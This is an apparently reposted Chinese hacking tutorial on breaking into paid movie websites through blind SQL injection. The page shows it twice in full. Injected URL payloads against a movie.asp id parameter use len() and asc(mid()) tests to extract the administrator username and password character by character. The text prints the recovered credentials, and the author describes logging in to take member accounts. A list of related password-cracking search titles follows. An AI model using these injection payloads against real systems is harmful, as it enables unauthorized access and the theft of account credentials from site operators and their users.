昆明位置定位图:破解影视网站的密码
来源:百度文库 编辑:偶看新闻 时间:2024/10/02 17:56:48
如何注入破解,收费电影网站密码!
请先进这个http://2000x.be/forumTopicRead.asp?id=702 了解一下收费电影网站的常见漏洞文件!
首先我们检查http://hhzl.qlmu.com/movie/movie.asp?id=56,先来测试一下,在最后加‘‘来检查是否有漏洞,http://hhzl.qlmu.com/movie/movie.asp?id=56’,出现提示出现访问错误,请勿尝试任何非法参数访问!,说明该文件过滤了代码‘,我们找个无代码过滤来测试,我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)
正常返回页面,由此我们可以知道管理员的帐号是大于4位的!
我们继续,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>
"无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的
我们再来,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)
正常返回页面,好极了,由此得出
name为8位
同样
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)
正常返回页面
pwd为21位,TNND的,这么长!
不管了,我们接下来开始测试管理员的用户名
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)
正常返回页面,看来还不够大.
注:mid函数可以把密码分成若干部分取出,使用方法 mid(字符串,起始位,取出的字符串的长度)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)
"无法显示页面",看来比100还小.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)
正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100
通过查询asc码表可以得到,
name的第一位为:d
接下来顺利的得到了name=darkeyes^
然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>100)
正常显示页面,再来
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>110)
"无法显示页面",比110小哦,呵呵
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)
正常显示页面,对了,得到
pwd的第一位为:f
最后顺利的得到了
pwd=xyfsdb7ew8y654231123d
找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵
下一个:电影网站高级会员FTP帐号
请先进这个http://2000x.be/forumTopicRead.asp?id=702 了解一下收费电影网站的常见漏洞文件!
首先我们检查http://hhzl.qlmu.com/movie/movie.asp?id=56,先来测试一下,在最后加‘‘来检查是否有漏洞,http://hhzl.qlmu.com/movie/movie.asp?id=56’,出现提示出现访问错误,请勿尝试任何非法参数访问!,说明该文件过滤了代码‘,我们找个无代码过滤来测试,我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)
正常返回页面,由此我们可以知道管理员的帐号是大于4位的!
我们继续,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>
"无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的
我们再来,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)
正常返回页面,好极了,由此得出
name为8位
同样
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)
正常返回页面
pwd为21位,TNND的,这么长!
不管了,我们接下来开始测试管理员的用户名
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)
正常返回页面,看来还不够大.
注:mid函数可以把密码分成若干部分取出,使用方法 mid(字符串,起始位,取出的字符串的长度)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)
"无法显示页面",看来比100还小.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)
正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100
通过查询asc码表可以得到,
name的第一位为:d
接下来顺利的得到了name=darkeyes^
然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>100)
正常显示页面,再来
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>110)
"无法显示页面",比110小哦,呵呵
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)
正常显示页面,对了,得到
pwd的第一位为:f
最后顺利的得到了
pwd=xyfsdb7ew8y654231123d
找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵
下一个:电影网站高级会员FTP帐号
破解网站进入的密码
怎样破解网站上的密码
什么软件可以破解网站的密码
请帮破解这个网站的密码
网站后台密码破解
江淮影视的网站
怎样破解需要证书的影视文件?
怎样才能破解需要证书的影视文件?
如何破解需要证书的影视文件?
怎么样可以破解网站上的用户和密码
破解的国外网站密码为什么用一段时间后会挂?
谁有破解网站后台密码的办法?
谁可以帮我破解一个网站的后台密码~~
怎样才能找到不用花钱又不用注册用户和密码的影视网站
怎样才能找到不用花钱又不用注册用户和密码的影视网站
破解excel的密码
winrar的密码破解
密码破解的方法?
windwos密码的破解
密码破解的方法!
破解密码的软件
网易泡泡的密码破解
小灵通密码的破解
破解d608的密码